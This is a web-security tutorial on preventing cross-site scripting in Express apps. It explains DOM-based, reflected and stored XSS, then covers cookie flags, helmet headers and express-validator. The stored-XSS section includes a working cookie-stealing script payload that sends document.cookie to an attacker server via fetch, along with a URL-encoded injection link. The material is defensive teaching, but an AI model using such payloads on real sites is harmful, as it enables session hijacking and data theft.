# Preventing Crosss Site Scripting (XSS) Attacks

## DOM-Based XSS Attacks

Using user inputs, including URL parameters, an attacker can inject malicious JavaScript and get the code to execute on a target’s machine. For example, imagine a site that dynamically displays a user’s name using the following code:

```javascript
greeting.innerHTML = "Welcome " + name + "!";
```

An attacker could inject code in the form of a script tag in the name field that would be run any time the name was loaded. This could also be inserted as a URL parameter:

```plaintext
http://somesite.com/userpage.html?name=<script>maliciousFunc(variable)</script>

# After using a URL shortener
https://somesite.com
```

## Reflected XSS Attack

Using malicious links or requests to the server, the attacker gets the server to execute code and return a response that could be potentially harmful. For example, an attacker could get a user to click on a link that encoded the following request:

```plaintext
http://www.somesite.com/profile?name=<script>maliciousFunc(variable)</script>
```

The `maliciousFunc` may send the profile information directly to the attacker's own server.

## Stored XSS Attack

Again, using user inputs, an attacker may be able to store malicious code on the database. Say in a review field on a travel booking site. An attacker can then use that code to send personal and sensitive data to their own server. In the review site example, the following could be inserted (if inputs are not sanitized) to steal a user’s authentication cookie, if an attacker was hosting a server at localhost:5000.

```plaintext
<script>fetch(`http://localhost:5000?data={document.cookie}`)</script>
```

Then using `encodeURIComponent` to ensure that the script will be read as a parameter:

```plaintext
http://rentaroom.com/?newReview=%3Cscript%3Efetch%28%60http%3A%2F%2Flocalhost%3A5000%3Fdata%3D%24%....Fscript%3E
```

## Securing Cookies and Headers

Since cookies contain sensitive data about a user and can be dangerous if stolen, it’s important to configure them properly. In an `express-session` generated cookie, you can ensure that the `httpOnly` and the `secure` options are activated. These will ensure that cookies are only transferred through http reqests and ensure that that connection has a verfied certificate, respectively. This can mitigate a client-side script from accessing the cookies.

```javascript
app.use(
  session({
    secret: "my-secret",
    resave: true,
    saveUninitialized: true,
    cookie: {
      httpOnly: true,
      secure: true
    },
  })
)
```

It’s also important to set security headers to keep attackers from sending fraudulent or malicious requests. Luckily, there are some modules that are already created to do this for us. One is `helmet` , and it will configure the `contentSecurityPolicy` and 11 other policies for us automatically. To use it, include it in your server code as such:

```javascript
app.use(helmet());
```

## Data Validation and Santitaion

It’s important to validate and sanitize any inputs that we receive from a user. A validation is confirming that the information is in a certain format, or does not contain certain characters or patterns (like a lingering single quote). Sanitation is the removal of those patterns before code continues to run, to protect the server from malicious code execution.

One package that we can use is `express-validator` by importing one of its useful functions: `check`

```javascript
const { check } = require("express-validator");
...
app.post("/login", [
  check('email').isEmail(),
], (req, res) => {});
```

In this example, the email would have been attached to the `req` object for accessing. Notice that the middleware here is in the form of an array, this way we can do multiple checks.

## DOM-Based Precautions

It is also a good idea to be very careful about what user inputs you are allowing to display on your web page. Document properties and methods like `document.innerHTML` and `document.write` will creat HTML elements that are executable if not handled carefully.

It’s best practice not to directly set inputs as content in the document, but also to ensure that you are validating and sanitizing all user inputs as well.

JavaScript does contain some methods that will input text rather than executable code like `element.textContent` rather than using `innerHTML` to ensure that your content is actually a string and not executable. But, even still, it would be safer to not directly set user input where possible.

